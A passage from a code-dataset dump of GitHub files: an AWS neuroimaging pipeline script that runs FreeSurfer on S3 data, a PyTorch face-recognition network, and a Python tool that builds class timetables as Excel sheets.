CPAC run on the ADHD200 subjects in MB\n - adhd200_outdirs_mb.yml - YAML of the directory sizes in MB\n - adhd200_upl_runtimes.png - histogram of the runtimes, in minutes, for output CPAC data to be uploaded to S3 from AWS EC2 instances\n - adhd200_upl_runtimes.yml - YAML of the runtimes in minutes\n - freesurfer_runtimes.png - histogram of the runtime to complete running 'recon-all' on all 50 of the subjects from IBA_TRT\n - fs_gpu_runtimes.png - histogram of runtimes for completing 'recon-all' using GPU optimizations on IBA_TRT\n - fs_gpu_runtimes.yml - YAML containing the runtimes in hours\n - fs_runtimes.yml - YAML containing the runtimes in hours\n\n scripts\n -------\n - act_interface.py - Nipype interface made to work with the ANTs cortical thickness extraction script found [here](https://raw.githubusercontent.com/stnava/ANTs/master/Scripts/antsCorticalThickness.sh)\n - act_run.py - Python script to run the ANTs cortical thickness script and upload results to S3\n - act_run.sge - SGE bash script to launch act_run.py over parallel HPC nodes via SGE\n - download_run_fs_gpu.py - script to download and run Freesurfer's 'recon-all' command using GPU-optimized binaries instead of CPU ones.\n - download_run_fs.py - script to download and run Freesurfer's 'recon-all' command on the CORR IBA_TRT data and then uploads the results to S3 on the 'fcp-indi' bucket\n - download_run_fs.sge - SGE bash script to launch download_run_fs.py over parallel HPC nodes via SGE\n - get_run_stats.py - Python script to pull data from pipeline log files and plot the runtime data\n\npaper\n-----\nTranscript related to the AWS paper (now on Google docs)\n\nposter\n------\nLaTeX files and images used to create the AWS/NDAR poster for OHBM 2015 and Neuroimformatics 2015\n\nspot-model\n----------\n- record_spot_price.py - Python module to record the spot price history from AWS and save histories to csv dataframes and log files\n- run_spot_sims.py - Python script to run AWS simulations over spot history in parallel using a configuration file and spot history csv\n- run_static_model.py Python script to run the AWS static pricing model given a per-hour price, availability zone, and configuration file\n- S3_costs_2mm.R - R script that models and plots AWS costs for based on CPAC runtimes for 2mm images\n- spot_sim_plots.R - R script to create static model plots for the poster\n- spot_sim_plots_Sw.R - R script to create static and simulation model plots for paper\n- spot_price_model.py - Python module to simulate job submissions over spot history and calculate runtimes and costs\n- utils.py - Python module with various utilities related to the AWS spot simulations, including dataframe consolidation and parallel processing\n\n configs\n -------\n ANTs, CPAC, and Freesurfer spot simulation config files with the runtime details for estimating time and cost of running on AWS\n\n csvs\n ----\n - ants_avg_simgs_and_static.csv - ANTs mean and median spot simulation averages along side static runtimes and costs\n - c3.8xlarge-allzones-avgs_03-15_09-04-2015.csv - Mean and median spot history price for the c3.8xlarge Linux/UNIX instance across availability zones from March 3 to Sept 4 2015\n - cpac_avg_simgs_and_static.csv - C-PAC mean and median spot simulation averages along side static runtimes and costs\n - fs_avg_simgs_and_static.csv - Freesurfer mean and median spot simulation averages along side static runtimes and costs\n\n plots\n -----\n Plots of the cost and times across number of datasets and bid ratios as well as mean simulation vs static costs and times\n" }, { "alpha_fraction": 0.6313799619674683, "alphanum_fraction": 0.6375236511230469, "avg_line_length": 28.119266510009766, "blob_id": "51a4ffbacfae7d8e6a810858e9a649c2b1ccea0f", "content_id": "8039e47d4f1d5be862a6244f5a798c3e7b7d6f6e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6348, "license_type": "permissive", "max_line_length": 88, "num_lines": 218, "path": "/data-preproc/scripts/download_run_fs.py", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", "src_encoding": "UTF-8", "text": "# download_run_fs.py\n#\n# Author: Daniel Clark, 2015\n\n'''\nThis module downloads anatomical data from S3 and runs freesurfer's\nrecon-all -all command on it\n\nUsage:\n python download_run_fs <index> <local_dir>\n'''\n\n# Setup log file\ndef setup_logger(logger_name, log_file, level, to_screen=False):\n '''\n Function to initialize and configure a logger that can write to file\n and (optionally) the screen.\n\n Parameters\n ----------\n logger_name : string\n name of the logger\n log_file : string\n file path to the log file on disk\n level : integer\n indicates the level at which the logger should log; this is\n controlled by integers that come with the python logging\n package. (e.g. logging.INFO=20, logging.DEBUG=10)\n to_screen : boolean (optional)\n flag to indicate whether to enable logging to the screen\n\n Returns\n -------\n logger : logging.Logger object\n Python logging.Logger object which is capable of logging run-\n time information about the program to file and/or screen\n '''\n\n # Import packages\n import logging\n\n # Init logger, formatter, filehandler, streamhandler\n logger = logging.getLogger(logger_name)\n logger.setLevel(level)\n formatter = logging.Formatter('%(asctime)s : %(message)s')\n\n # Write logs to file\n file_handler = logging.FileHandler(log_file)\n file_handler.setFormatter(formatter)\n logger.addHandler(file_handler)\n\n # Write to screen, if desired\n if to_screen:\n stream_handler = logging.StreamHandler()\n stream_handler.setFormatter(formatter)\n logger.addHandler(stream_handler)\n\n # Return the logger\n return logger\n\n\n# Form list of anatomical s3 keys\ndef return_anat_dict(bucket, prefix):\n '''\n Function to create and return an dictionary from an S3 bucket\n prefix, where the key is the subject unique id and the value is the\n S3 key filepath\n\n Parameters\n ----------\n bucket : boto.s3.bucket.Bucket instance\n an instance of the boto S3 bucket class to download from\n prefix : string\n S3 bucket prefix to parse for anatomical data in\n\n Returns\n -------\n key_dict : dictionary\n dictionary of unique subject id's as keys and S3 key filepaths\n as values\n '''\n\n # Init variables\n key_list = []\n key_dict = {}\n\n # Check prefix\n if not prefix.endswith('/'):\n prefix = prefix + '/'\n\n # Gather all anatomical files\n for key in bucket.list(prefix=prefix):\n key_name = str(key.name)\n if 'anat' in key_name:\n key_list.append(key_name)\n print 'Adding %s to list...' % key_name\n\n # Create subject dictionary\n for key_idx, key_name in enumerate(key_list):\n\n # Grab unique subj/session as id\n key_suffix = key_name.replace(prefix, '')\n subj_id = '-'.join(key_suffix.split('/')[:2])\n\n # Add key, val to dictionary\n key_dict[subj_id] = key_name\n\n # Return dictionary\n return key_dict\n\n\n# Main routine\ndef main(index, local_dir):\n '''\n Function to download an anatomical dataset from S3 and process it\n through Freesurfer's recon-all command, then upload the data back\n to S3\n\n Parameters\n ----------\n index : integer\n the index of the subject to process\n local_dir : string\n filepath to the local directory to store the input and\n processed outputs\n '''\n\n # Import packages\n import boto\n import logging\n import os\n import subprocess\n from CPAC.AWS import aws_utils, fetch_creds\n\n # Init variables\n creds_path = '/home/ubuntu/secure-creds/aws-keys/fcp-indi-keys2.csv'\n bucket = fetch_creds.return_bucket(creds_path, 'fcp-indi')\n prefix = 'data/Projects/CORR/RawData/IBA_TRT/'\n dl_dir = os.path.join(local_dir, 'inputs')\n subjects_dir = os.path.join(local_dir, 'subjects')\n\n # Setup logger\n fs_log_path = os.path.join(local_dir, 'download_run_fs_%d.log' % index)\n fs_log = setup_logger('fs_log', fs_log_path, logging.INFO, to_screen=True)\n\n # Make input and subject dirs\n if not os.path.exists(dl_dir):\n os.makedirs(dl_dir)\n\n if not os.path.exists(subjects_dir):\n os.makedirs(subjects_dir)\n\n # Get S3 anatomical paths dictionary\n anat_dict = return_anat_dict(bucket, prefix)\n\n # Get list of unique subject ids to download\n key_list = sorted(anat_dict.keys())\n\n # Extract subject of interest\n subj_id = key_list[index]\n s3_path = anat_dict[subj_id]\n\n # Download data\n fs_log.info('Downloading %s...' % s3_path)\n s3_key = bucket.get_key(s3_path)\n s3_filename = os.path.basename(s3_path)\n dl_filename = os.path.join(dl_dir, subj_id, s3_filename)\n\n # Make folders if need be\n dl_dirs = os.path.dirname(dl_filename)\n if not os.path.exists(dl_dirs):\n os.makedirs(dl_dirs)\n s3_key.get_contents_to_filename(dl_filename)\n\n # Execute recon-all\n cmd_list = ['recon-all', '-openmp', '4', '-i', dl_filename,\n '-subjid', subj_id, '-qcache', '-all']\n cmd_str = ' '.join(cmd_list)\n fs_log.info('Executing %s...' % cmd_str)\n # Use subprocess to send command and communicate outputs\n proc = subprocess.Popen(cmd_list, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n # Stream output\n while proc.poll() is None:\n stdout_line = proc.stdout.readline()\n fs_log.info(stdout_line)\n\n proc.wait()\n\n # Gather processed data\n fs_log.info('Gathering outputs for upload to S3...')\n upl_list = []\n subj_dir = os.path.join(subjects_dir, subj_id)\n for root, dirs, files in os.walk(subj_dir):\n if files:\n upl_list.extend([os.path.join(root, fl) for fl in files])\n # Update log with upload info\n fs_log.info('Gathered %d files for upload to S3' % len(upl_list))\n\n # Build upload list\n upl_prefix = os.path.join(prefix.replace('RawData', 'Outputs'),\n 'freesurfer', subj_id)\n s3_upl_list = [upl.replace(subj_dir, upl_prefix) for upl in upl_list]\n\n # Upload to S3\n aws_utils.s3_upload(bucket, upl_list, s3_upl_list, overwrite=True, make_public=True)\n\n\n# Make executable\nif __name__ == '__main__':\n\n # Import packages\n import sys\n\n # Init variables\n index = int(sys.argv[1])-1\n local_dir = sys.argv[2]\n\n main(index, local_dir)\n" } ]
19
jh-001/faceRecognition_NIR-VIS
https://github.com/jh-001/faceRecognition_NIR-VIS
bbb6cd6ef62a3012e07d5f39e90451eb1cfccd29
4b162c25ec042708ab6ec655ab0712554e053a13
955ebe401369482bd663b965431bb2bcdf7f7ca1
refs/heads/master
2023-03-23T00:25:56.308431
2019-03-18T08:52:58
2019-03-18T08:52:58
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5186424255371094, "alphanum_fraction": 0.5635755062103271, "avg_line_length": 33.278690338134766, "blob_id": "d0e64237d7ed06a36c86ab8a13d96659a4d3fd04", "content_id": "e30d31fe81ff3e601c702696cbe80ef6ac63376b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2092, "license_type": "no_license", "max_line_length": 106, "num_lines": 61, "path": "/models/IDR.py", "repo_name": "jh-001/faceRecognition_NIR-VIS", "src_encoding": "UTF-8", "text": "'''\nimplement paper 2017 AAAI Learning Invariant Deep Representation for NIR-VIS Face Recognition\n'''\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass mfm(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, padding=1, type=1):\n super(mfm, self).__init__()\n self.out_channels = out_channels\n if type == 1:\n self.filter = nn.Conv2d(in_channels, 2 * out_channels, kernel_size=kernel_size, stride=stride,\n padding=padding)\n else:\n self.filter = nn.Linear(in_channels, 2 * out_channels)\n\n def forward(self, x):\n x = self.filter(x)\n out = torch.split(x, self.out_channels, 1)\n return torch.max(out[0], out[1])\n\n\nclass group(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size, stride, padding):\n super(group, self).__init__()\n self.conv_a = mfm(in_channels, in_channels, 1, 1, 0)\n self.conv = mfm(in_channels, out_channels, kernel_size, stride, padding)\n\n def forward(self, x):\n x = self.conv_a(x)\n x = self.conv(x)\n return x\n\n\nclass network_9layers(nn.Module):\n def __init__(self, num_classes=79077):\n super(network_9layers, self).__init__()\n self.features = nn.Sequential(\n mfm(1, 48, 5, 1, 2),\n nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True),\n group(48, 96, 3, 1, 1),\n nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True),\n group(96, 192, 3, 1, 1),\n nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True),\n group(192, 128, 3, 1, 1),\n group(128, 128, 3, 1, 1),\n nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True),\n )\n self.fc1 = mfm(8 * 8 * 128, 256, type=0)\n self.fc2 = nn.Linear(256, num_classes)\n\n def forward(self, x):\n x = self.features(x)\n x = x.view(x.size(0), -1)\n x = self.fc1(x)\n x = F.dropout(x, training=self.training)\n out = self.fc2(x)\n return out, x\n\n" } ]
1
treuille/img-to-base64
https://github.com/treuille/img-to-base64
4d736331001b337aa700636e81780dc1b528f5af
dc41f4300cc1e8debb0c0566d034604413423f53
0dd4eda6ae16f610224dcc52ab237452f06775d6
refs/heads/main
2022-12-21T01:53:09.927011
2020-10-08T02:26:44
2020-10-08T02:26:44
302,056,094
1
1
Apache-2.0
2020-10-07T14:07:27
2020-10-08T02:27:56
2020-10-08T02:27:54
Python
[ { "alpha_fraction": 0.7323943376541138, "alphanum_fraction": 0.7887324094772339, "avg_line_length": 34.5, "blob_id": "3771e3d4f40298ba3bdf285ea96b1bd4144aed50", "content_id": "72d183d7416741dc7de07b07bb86cdd1fb49a29c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 71, "license_type": "permissive", "max_line_length": 54, "num_lines": 2, "path": "/README.md", "repo_name": "treuille/img-to-base64", "src_encoding": "UTF-8", "text": "# img-to-base64\nA little Streamlit app that converts images to base64.\n" }, { "alpha_fraction": 0.6479859948158264, "alphanum_fraction": 0.6587857604026794, "avg_line_length": 29.58035659790039, "blob_id": "11224751ef01fa4c2a37f6f632c5b2e5be5399af", "content_id": "b897d23f4f245241e28233f41b5e3e76abc644d5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3426, "license_type": "permissive", "max_line_length": 144, "num_lines": 112, "path": "/streamlit_app.py", "repo_name": "treuille/img-to-base64", "src_encoding": "UTF-8", "text": "import streamlit as st\nfrom PIL import Image\nimport numpy as np\nimport base64\nfrom io import BytesIO\nimport yaml\nimport textwrap\nimport streamlit.components.v1 as components\n\[email protected]\ndef load_image(filename, new_img_width, remove_top_pixels):\n # Shave off some pixels from the top\n im = Image.open(open(filename, 'rb'))\n im = np.array(im)[remove_top_pixels:,:,:]\n im = Image.fromarray(im)\n\n # Downsample the image\n old_img_width, old_img_height = im.size\n new_img_height = (old_img_height * new_img_width) // old_img_width\n im = im.resize((new_img_width, new_img_height), Image.LANCZOS)\n\n # All done!\n return im\n\ndef base64_img_html(im, width):\n io_buffer = BytesIO()\n st.experimental_show(type(im))\n im.save(io_buffer, format=\"JPEG\")\n img_str = base64.b64encode(io_buffer.getvalue()).decode(\"utf-8\")\n st.experimental_show(type(img_str))\n img_tag = f'<img style=\"border: 1px solid #ddd\" src=\"data:image/jpeg;base64,{img_str}\" />'\n # img_tag = f'<img style=\"width:{width}px\" src=\"https://raw.githubusercontent.com/treuille/img-to-base64/main/screenshot-1-face-gan.png\"/>' \n return img_tag\n\ndef captioned_img_html(app_num, base64_img, name, live_url, git_url, width):\n return textwrap.dedent(f'''\n <div style=\"width:{width}px; margin-right:20px; margin-bottom:20px\">\n {base64_img}\n <div style=\"width:{width}px; text-align:center; margin-top:3px; font-family: Sans-Serif; font-size: 10px\">\n ({app_num})\n <a href=\"{live_url}\">Live App</a> |\n <a href=\"{git_url}\">Github Source</a>\n </div>\n </div>\n ''')\n# st.code(img_tag, language='html')\n\n\n# Remove the file uploader deprecation warning.\nst.set_option('deprecation.showfileUploaderEncoding', False)\n\n\"# Grid Figure Creator\"\n\n# Sidebar configuration\nshow_config = st.sidebar.checkbox('Show raw config', True)\n\n# Load the config information from the user.\nconfig = yaml.load(open('table_config.yaml'))\nnew_img_width = config['img-width']\nremove_top_pixels = config['remove-top-pixels']\n\nst.experimental_show(new_img_width)\nst.experimental_show(remove_top_pixels)\n\n# Create the images\nfigure_html = \"\"\nfor img_num, img_info in enumerate(config['imgs']):\n image = load_image(img_info['filename'], new_img_width, remove_top_pixels)\n st.image(image)\n st.experimental_show(type(image))\n base64_img = base64_img_html(image, new_img_width)\n captioned_img = captioned_img_html(img_num + 1,\n base64_img, img_info['name'],\n img_info['live-url'], img_info['git-url'],\n new_img_width)\n figure_html += captioned_img + '\\n'\n\n# Wrap everything in a giant div\nfigure_html = textwrap.dedent(f'''\n<div style=\"display: flex; flex-wrap: wrap; justify-content: center\">\n{textwrap.indent(figure_html, prefix=\" \")}\n</div>\n''')\n\ncomponents.html(figure_html, height=400)\nst.code(figure_html, language='html')\n\n\n# Show the raw configuration data at the bottom.\nif show_config:\n st.write('## Raw config', config)\n\nst.stop()\n\n# \"## Input\"\n# \n# IMAGE_FORMATS = ['png', 'jpg', 'jpeg']\n# file = st.file_uploader('Select an image file.', type=IMAGE_FORMATS)\n# \n# \n# st.experimental_show(remove_top_pixels)\n# st.experimental_show(new_img_width)\n# \n# if st.checkbox('Show help.'):\n# st.help(st.file_uploader)\n# \n# if not file:\n# st.warning(\"Please upload an image file.\")\n# st.stop()\n# \n# \"## Output\"\n# \n" } ]
2
FrancoCuevas444/TimeTable-Generator
https://github.com/FrancoCuevas444/TimeTable-Generator
a68f4215c01309686ef4503ee4ca7fdf0b8a44ce
628e80b2d719d4aabfa625d3bdd221c8226fcdc1
95b771398e8d9c93397df0a5732828b7e12b571b
refs/heads/master
2020-04-02T17:56:58.504886
2017-10-19T02:47:16
2017-10-19T02:47:16
97,790,274
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.570514976978302, "alphanum_fraction": 0.5819589495658875, "avg_line_length": 34.23170852661133, "blob_id": "c2274bb47e103b3fa226d2e0c53450638590cdbf", "content_id": "d49955da09e8024c9e4db2ac1a75b8ef3649bdec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2972, "license_type": "no_license", "max_line_length": 98, "num_lines": 82, "path": "/TimeTableModule.py", "repo_name": "FrancoCuevas444/TimeTable-Generator", "src_encoding": "UTF-8", "text": "from SubjectEntryModule import *\r\nfrom openpyxl import *\r\nfrom openpyxl.styles import *\r\n\r\nclass TimeTable:\r\n def __init__(self, subjectList, step=30):\r\n self.subjectList = subjectList\r\n self.step = step\r\n self.baseTimeRange = TimeRange.findTimeRange(subjectList)\r\n\r\n def rowsFromTimeRange(self, timeRange):\r\n firstRow = 2 + (Time.distance(self.baseTimeRange.initial, timeRange.initial) // self.step)\r\n rows = [i + firstRow for i in range(len(timeRange)//self.step)]\r\n return rows\r\n\r\n def getCells(self, day, timeRange):\r\n column = day.getColumn()\r\n rows = self.rowsFromTimeRange(timeRange)\r\n\r\n cells = [column+str(row) for row in rows]\r\n return cells\r\n\r\n def addSubject(self, ws, subject):\r\n\r\n for day in subject.days:\r\n cells = self.getCells(day, subject.timeRange)\r\n ws.merge_cells(\"{}:{}\".format(cells[0], cells[-1]))\r\n for cell in cells:\r\n ws[cell] = \"{}\\n{}\".format(subject.name, str(subject.module))\r\n ws[cell].style = \"subjectStyle\"\r\n\r\n def generateTable(self, filename):\r\n wb = Workbook()\r\n ws = wb.active\r\n self.initStyle(wb)\r\n self.addDays(ws)\r\n self.addTimeMarks(ws)\r\n\r\n for subject in self.subjectList:\r\n self.addSubject(ws, subject)\r\n\r\n #self.setTableBorder(ws)\r\n wb.save(filename)\r\n\r\n def setTableBorder(self, ws):\r\n thickSide = Side(style=\"thick\", color=\"000000\")\r\n boldBorder = Border(right=thickSide, left=thickSide, top=thickSide, bottom=thickSide)\r\n\r\n cellsRange = \"A1:F{}\".format(1+len(self.baseTimeRange)//self.step)\r\n rows = ws[cellsRange]\r\n\r\n for row in rows:\r\n row[0].border = Border(left=thickSide)\r\n row[-1].border = Border(right=thickSide)\r\n for cell in rows[0]:\r\n cell.border = Border(top=thickSide)\r\n\r\n def addDays(self, ws):\r\n ws[\"B1\"] = \"Lunes\"\r\n ws[\"C1\"] = \"Martes\"\r\n ws[\"D1\"] = \"Miércoles\"\r\n ws[\"E1\"] = \"Jueves\"\r\n ws[\"F1\"] = \"Viernes\"\r\n\r\n for colName in [\"A\",\"B\",\"C\",\"D\",\"E\",\"F\"]:\r\n col = ws.column_dimensions[colName]\r\n col.width = 18\r\n\r\n def addTimeMarks(self, ws):\r\n timeList = TimeRange.timeRangeArray(self.baseTimeRange, self.step)\r\n i = 0\r\n for row in ws.iter_rows(min_row=2, max_col=1, max_row=len(timeList)):\r\n for cell in row:\r\n cell.value = str(TimeRange(timeList[i],timeList[i+1]))\r\n i+=1\r\n\r\n def initStyle(self, wb):\r\n centered = Alignment(horizontal=\"center\", vertical=\"center\", wrapText=True)\r\n mediumSide = Side(style=\"medium\", color=\"000000\")\r\n border = Border(left=mediumSide, right=mediumSide, top=mediumSide, bottom=mediumSide)\r\n subjectStyle = NamedStyle(name=\"subjectStyle\", border=border, alignment=centered)\r\n wb.add_named_style(subjectStyle)\r\n" }, { "alpha_fraction": 0.636886715888977, "alphanum_fraction": 0.6414294242858887, "avg_line_length": 37.78313064575195, "blob_id": "03d18c3b5ffe2c3c04d91a3b44afc145cb1044f8", "content_id": "02956dcb5bf3b82c78c527280f45fc24f5cd7a2b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3302, "license_type": "no_license", "max_line_length": 203, "num_lines": 83, "path": "/TimeTableGenerator.py", "repo_name": "FrancoCuevas444/TimeTable-Generator", "src_encoding": "UTF-8", "text": "from SubjectEntryModule import *\r\nfrom TimeTableModule import *\r\nfrom SubjectsPermutations import *\r\nfrom TimeModule import TimeRange\r\nimport sys\r\n\r\nVERSION = 0.1\r\n\r\n# Main entry of the program\r\ndef main():\r\n #Reading arguments from console for: JSON filename, initial time and final time\r\n if(len(sys.argv) < 4):\r\n print(\"Incorrect number of parameters!\")\r\n print(\"You must have: json filename, initial time and final time as parameters\")\r\n exit()\r\n\r\n jsonName = sys.argv[1]\r\n initialTime = Time.fromString(sys.argv[2])\r\n finalTime = Time.fromString(sys.argv[3])\r\n\r\n #Welcome message\r\n welcomeMessage(jsonName, initialTime, finalTime)\r\n\r\n #Counter for amount of tables generated\r\n table_number = 0\r\n myTimeRange = TimeRange(initialTime, finalTime)\r\n\r\n #Calculating posible combinations of subjects\r\n tableOfChoices = generateTableFromJSON(\"Resources/{}\".format(jsonName))\r\n\r\n while(not allTrueInTable(tableOfChoices)):\r\n #Generate one posible combination\r\n choices = generateNext(tableOfChoices)\r\n #Grab the info for that combination\r\n subjects = SubjectEntry.parseJSONWithChoices(\"Resources/{}\".format(jsonName), choices)\r\n\r\n #Checking if the list of subjects is compatible, and generating the table if true\r\n if(checkSubjectList(subjects, False)):\r\n myTimeTable = TimeTable(subjects)\r\n if(TimeRange.timeRangesInside(myTimeTable.baseTimeRange, myTimeRange)):\r\n myTimeTable.generateTable(\"Generated Tables/timeTable{}.xlsx\".format(table_number))\r\n table_number += 1\r\n\r\n #Output result\r\n print(\"{} tables were generated.\".format(table_number))\r\n\r\n#Generate a list of lists of Choices from the json file\r\ndef generateTableFromJSON(filepath):\r\n myFile = open(filepath, encoding=\"utf-8-sig\")\r\n myJSON = json.load(myFile)\r\n myTable = []\r\n for subject in myJSON:\r\n choices_list = []\r\n for choice in myJSON[subject]:\r\n if(choice != \"name\" and choice != \"module\"):\r\n choices_list.append(Choice(subject, choice))\r\n myTable.append(choices_list)\r\n return myTable\r\n\r\n\r\n#Checks if the subject list doesn't have any overlapping subjects (overlapping timerange and same day)\r\ndef checkSubjectList(subjectList, printing=True):\r\n overlapingList = SubjectEntry.subjectListOverlap(subjectList)\r\n if (overlapingList == []): return True\r\n elif(printing):\r\n print(\"The following subjects are overlaping: \")\r\n for pair in overlapingList:\r\n print(\"{} ({}) and {} ({}) with days in common: {}\".format(pair[0].name, pair[0].timeRange, pair[1].name, pair[1].timeRange, [str(day) for day in SubjectEntry.daysInCommon(pair[0],pair[1])]))\r\n return False\r\n\r\n#Simple welcome message\r\ndef welcomeMessage(jsonfile, initial, final):\r\n print(\"=============================================\")\r\n print(\" TimeTable Generator ver. {}\".format(VERSION))\r\n print(\"=============================================\")\r\n print(\"Current settings:\")\r\n print(\" - JSON filename: {}\".format(jsonfile))\r\n print(\" - Initial Time: {}\".format(initial))\r\n print(\" - Final Time: {}\".format(final))\r\n print(\"\\nGenerating...\\n\")\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n" }, { "alpha_fraction": 0.7400405406951904, "alphanum_fraction": 0.7427414059638977, "avg_line_length": 58.15999984741211, "blob_id": "9ee09c6dec58a9bd72579d9d58b9fed4dc97c596", "content_id": "355de1c03a4ada692c530566455bf3057777d67e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1484, "license_type": "no_license", "max_line_length": 243, "num_lines": 25, "path": "/README.md", "repo_name": "FrancoCuevas444/TimeTable-Generator", "src_encoding": "UTF-8", "text": "# TimeTable-Generator\nConsole program written in Python 3 that generates all posible time arrangenments for subjects given a JSON file with the options\n# Files you need\nIn orfer to run the program you need a JSON file with correct format (last section) inside Resources\n# How to run\nIn order to run the program you must have installed Python 3.\nThen you simply run:\n```\npython TimeTableGenerator.py jsonFileName initialTime finalTime\n```\nWhere ```jsonFileName``` is the file name of the JSON file inside folder \"Resources\" with the posible choices for the subjects (More on this in next section). \nThe parameters ```initalTime``` and ```finalTime``` are a way of choosing only the tables that have all the subjects between those times.\n\n# JSON File\nFor this program to work you need to create a folder called ```Resources``` and include inside of it a JSON file. This file will have all subjects with all the posible time intervals.\nThe format to use is the one in ```Resorces/jsonTemplate.json```.\nWhere ```module``` can be ```{\"Teórico, \"Práctico\", \"Teo-Pra\", \"Consulta\"}```, both ```initialTime``` and ```finishTime``` are given by a 24 hour representation and ```days``` can be ```{\"Lunes\", \"Martes\", \"Miércoles\", \"Jueves\", \"Viernes\"}```.\n\n# Dependencies\nThis program uses ```openpyxl```.\n# TODO\nThere's still a lot of work to do, but the main ones right now are:\n\n- Automate JSON file creation with either a UI or cmd prompts.\n- Fix language variations on days and modules.\n\n\n" }, { "alpha_fraction": 0.5609436631202698, "alphanum_fraction": 0.5661861300468445, "avg_line_length": 27.921567916870117, "blob_id": "82c59b75da8520a5926e8f9ede43e39a3701be5f", "content_id": "7638b2cc513c94a5b22ef9dc34c6281bf17cd84d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1526, "license_type": "no_license", "max_line_length": 75, "num_lines": 51, "path": "/SubjectsPermutations.py", "repo_name": "FrancoCuevas444/TimeTable-Generator", "src_encoding": "UTF-8", "text": "class Choice:\r\n def __init__(self, name, code):\r\n self.name = name\r\n self.code = code\r\n self.visited = False\r\n\r\ndef generateNext(table):\r\n nextPerm = {}\r\n\r\n for i in range(len(table)):\r\n if(allFalseInList(table[i])):\r\n nextPerm[table[i][0].name] = table[i][0].code\r\n table[i][0].visited = True\r\n elif(allTrueInTable(table[i+1:])):\r\n setAllFalse(table[(i+1):])\r\n firstFalse = firstFalseIndex(table[i])\r\n nextPerm[table[i][firstFalse].name] = table[i][firstFalse].code\r\n table[i][firstFalse].visited = True\r\n else:\r\n lastTrue = lastTrueIndex(table[i])\r\n nextPerm[table[i][lastTrue].name] = table[i][lastTrue].code\r\n\r\n return nextPerm\r\n\r\ndef allFalseInList(choicesList):\r\n for choice in choicesList:\r\n if(choice.visited == True):\r\n return False\r\n return True\r\n\r\ndef allTrueInTable(table):\r\n for row in table:\r\n for choice in row:\r\n if(choice.visited == False):\r\n return False\r\n return True\r\n\r\ndef setAllFalse(table):\r\n for row in table:\r\n for choice in row:\r\n choice.visited = False\r\n\r\ndef firstFalseIndex(choicesList):\r\n for i in range(len(choicesList)):\r\n if(choicesList[i].visited == False):\r\n return i\r\ndef lastTrueIndex(choicesList):\r\n for i in range(len(choicesList)-1):\r\n if(choicesList[i+1].visited == False):\r\n return i\r\n return len(choicesList)-1\r\n" }, { "alpha_fraction": 0.5848184823989868, "alphanum_fraction": 0.5944994688034058, "avg_line_length": 33.5078125, "blob_id": "6e21676af247a412e9f13eb613e4415595e357a2", "content_id": "a1ed689e69919ee6c9c07a1ab8228c18aa4bd029", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4547, "license_type": "no_license", "max_line_length": 117, "num_lines": 128, "path": "/TimeModule.py", "repo_name": "FrancoCuevas444/TimeTable-Generator", "src_encoding": "UTF-8", "text": "import copy\r\nfrom enum import IntEnum\r\n\r\n#A representation of \"Days\"\r\nclass Days(IntEnum):\r\n LUNES = 0\r\n MARTES = 1\r\n MIERCOLES = 2\r\n JUEVES = 3\r\n VIERNES = 4\r\n\r\n def __str__(self):\r\n if(self.value == 0): return \"Lunes\"\r\n elif(self.value == 1): return \"Martes\"\r\n elif(self.value == 2): return \"Miércoles\"\r\n elif(self.value == 3): return \"Jueves\"\r\n elif(self.value == 4): return \"Viernes\"\r\n\r\n def getColumn(self):\r\n if(self.value == 0): return \"B\"\r\n elif(self.value == 1): return \"C\"\r\n elif(self.value == 2): return \"D\"\r\n elif(self.value == 3): return \"E\"\r\n elif(self.value == 4): return \"F\"\r\n\r\n def fromString(string):\r\n if (string == \"Lunes\"): return Days.LUNES\r\n elif (string == \"Martes\"): return Days.MARTES\r\n elif (string == \"Miércoles\"): return Days.MIERCOLES\r\n elif (string == \"Jueves\"): return Days.JUEVES\r\n elif (string == \"Viernes\"): return Days.VIERNES\r\n\r\n def fromStringArray(stringArr):\r\n daysArray = []\r\n for x in stringArr:\r\n daysArray.append(Days.fromString(x))\r\n return daysArray\r\n\r\nclass Time:\r\n\r\n def __init__(self, hours, minutes):\r\n self.hours = hours\r\n self.minutes = minutes\r\n\r\n def fromString(timeString):\r\n time = timeString.split(':')\r\n timeObj = Time(int(time[0]), int(time[1]))\r\n return timeObj\r\n\r\n def __str__(self):\r\n if (self.minutes > 9):\r\n return \"{}:{}\".format(self.hours, self.minutes)\r\n else:\r\n return \"{}:0{}\".format(self.hours, self.minutes)\r\n\r\n def add(self, minutes):\r\n self.hours += (self.minutes + minutes) // 60\r\n self.minutes = (self.minutes + minutes) % 60\r\n\r\n def isLater(self, otherTime):\r\n return (self.hours > otherTime.hours) or (self.hours == otherTime.hours and self.minutes > otherTime.minutes)\r\n\r\n def isEqual(self, otherTime):\r\n return (self.hours == otherTime.hours) and (self.minutes == otherTime.minutes)\r\n\r\n def distance(time1, time2):\r\n totalMin = 0\r\n if time1<=time2:\r\n minutes = time2.minutes - time1.minutes\r\n hours = time2.hours - time1.hours\r\n totalMin = hours*60 + minutes\r\n else:\r\n minutes = time1.minutes - time2.minutes\r\n hours = time1.hours - time2.hours\r\n totalMin = hours*60 + minutes\r\n return totalMin\r\n\r\n def __lt__(self, 